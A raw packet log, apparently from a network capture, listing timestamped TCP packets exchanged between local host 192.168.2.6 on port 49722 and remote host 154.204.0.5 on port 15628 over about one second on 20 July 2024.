Jul 20, 2024 16:31:48.052826881 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.052938938 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.057897091 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.057971954 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.062951088 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.063057899 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.070960045 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.071047068 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.077915907 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.078049898 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.083239079 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.083334923 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.089395046 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.089467049 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.094352961 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.094420910 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.102153063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.102220058 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.111926079 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.112001896 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.117975950 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.118067980 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.123986959 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.124064922 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.147073984 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.147150993 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.152667999 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.152796984 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.158143997 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.158215046 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.163074970 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.163160086 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.168212891 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.168288946 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.173753977 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.173851967 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.182145119 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.182257891 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.187203884 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.187330961 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.192238092 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.192301035 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.200093985 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.200159073 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.207453012 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.207535028 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.212583065 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.212675095 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.217978954 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.218070030 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.223853111 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.223973989 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.230823040 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.230916977 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.235815048 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.235883951 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.241904974 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.241981030 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.250175953 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.250252008 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.255865097 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.255928993 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.261780024 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.269287109 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.274514914 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.284071922 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.289016962 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.289072990 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.294040918 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.294114113 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.299108028 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.299180984 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.304054022 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.304141045 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.309230089 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.309344053 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.316660881 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.316745996 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.334557056 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.334629059 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.339551926 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.339627981 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.344639063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.344774008 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.350120068 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.350187063 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.355634928 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.355726004 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.363322020 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.363396883 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.368344069 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.368469000 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.373779058 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.373853922 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.378843069 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.378921032 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.385024071 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.385107040 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.390319109 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.390393019 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.395313025 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.395404100 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.400394917 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.400573015 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.405752897 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.405826092 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.410934925 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.411012888 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.419411898 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.419519901 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.427927017 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.428030968 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.433087111 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.433168888 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.438268900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.438366890 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.445071936 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.445139885 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.450212955 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.450290918 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.455575943 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.455641031 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.461437941 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.461513042 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.466775894 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.466856956 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.471890926 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.471997976 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.477281094 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.477363110 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.482495070 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.482588053 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.487612963 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.487683058 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.492723942 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.492805958 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.498172045 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.498251915 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.503988981 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.504142046 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.509238005 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.509331942 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.514507055 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.514578104 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.519618988 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.519726038 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.525743961 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.525841951 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.532244921 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.532445908 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.537533045 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.537635088 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.542885065 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.543010950 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.553083897 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.553155899 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.560930967 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.561044931 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.567153931 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.567240000 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.575417995 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.575859070 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.581981897 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.582114935 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.587121010 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.587337971 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.594501972 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.594702959 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.601053953 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.601152897 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.606188059 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.606395960 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.611474991 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.611562014 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.617759943 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.617882013 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.624728918 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.624965906 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.632860899 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.632986069 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.639269114 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.639487982 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.644645929 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.644798994 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.649811983 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.649934053 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.655632019 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.656188965 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.661448956 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.661544085 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.666943073 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.667047024 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.672111988 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.672238111 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.677346945 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.677444935 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.682761908 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.682873011 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.689841032 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.689989090 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.695168972 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.695281982 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.700588942 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.700726986 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.706473112 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.706557989 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.712172031 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.712330103 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.718413115 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.718590021 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.725162983 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.725253105 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.731903076 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.732070923 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.737030029 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.737252951 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.743202925 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.743288994 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.748167038 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.748249054 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.753540039 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.753711939 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.758614063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.758783102 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.763916016 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.764055967 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.769049883 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.769299984 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.774310112 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.774599075 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.779789925 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.779917955 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.785207987 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.785475969 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.791743994 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.791920900 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.797238111 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.797389030 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.806961060 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.807095051 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.813282013 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.813429117 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.819006920 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.819278955 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.824198008 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.824325085 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.829653978 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.829926014 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.836044073 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.836184025 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.841383934 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.841474056 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.846467018 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.846626043 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.852416039 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.852551937 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.857561111 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.861582994 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.866632938 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.866760015 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.871862888 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.872029066 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.882061958 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.882242918 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.887556076 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.887685061 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.892838001 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.893049002 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.898123980 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.898416042 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.903363943 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.903501034 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.908570051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.908719063 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.913985014 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.914105892 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.919101954 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.919429064 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.924581051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.924710989 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.931360960 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.931463957 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.936780930 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.936901093 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.941926003 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.942049980 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.950203896 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.950300932 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.955605030 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.955734968 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.960926056 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.961023092 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.965951920 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.966048002 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.971160889 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.971297979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.976298094 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.976433992 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.981372118 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.981472969 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.989938021 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.990190983 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:48.995182037 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:48.995316029 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.000291109 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.000369072 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.005321980 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.005387068 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.010421038 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.010490894 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.015722990 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.015800953 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.020783901 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.020878077 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.025938988 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.029659033 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.037641048 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.037720919 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.044787884 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.045241117 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.050182104 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.050295115 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.055195093 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.056730986 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:49.061664104 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:49.061760902 CEST	49722	15628	192.168.2.6	154.204.0.5
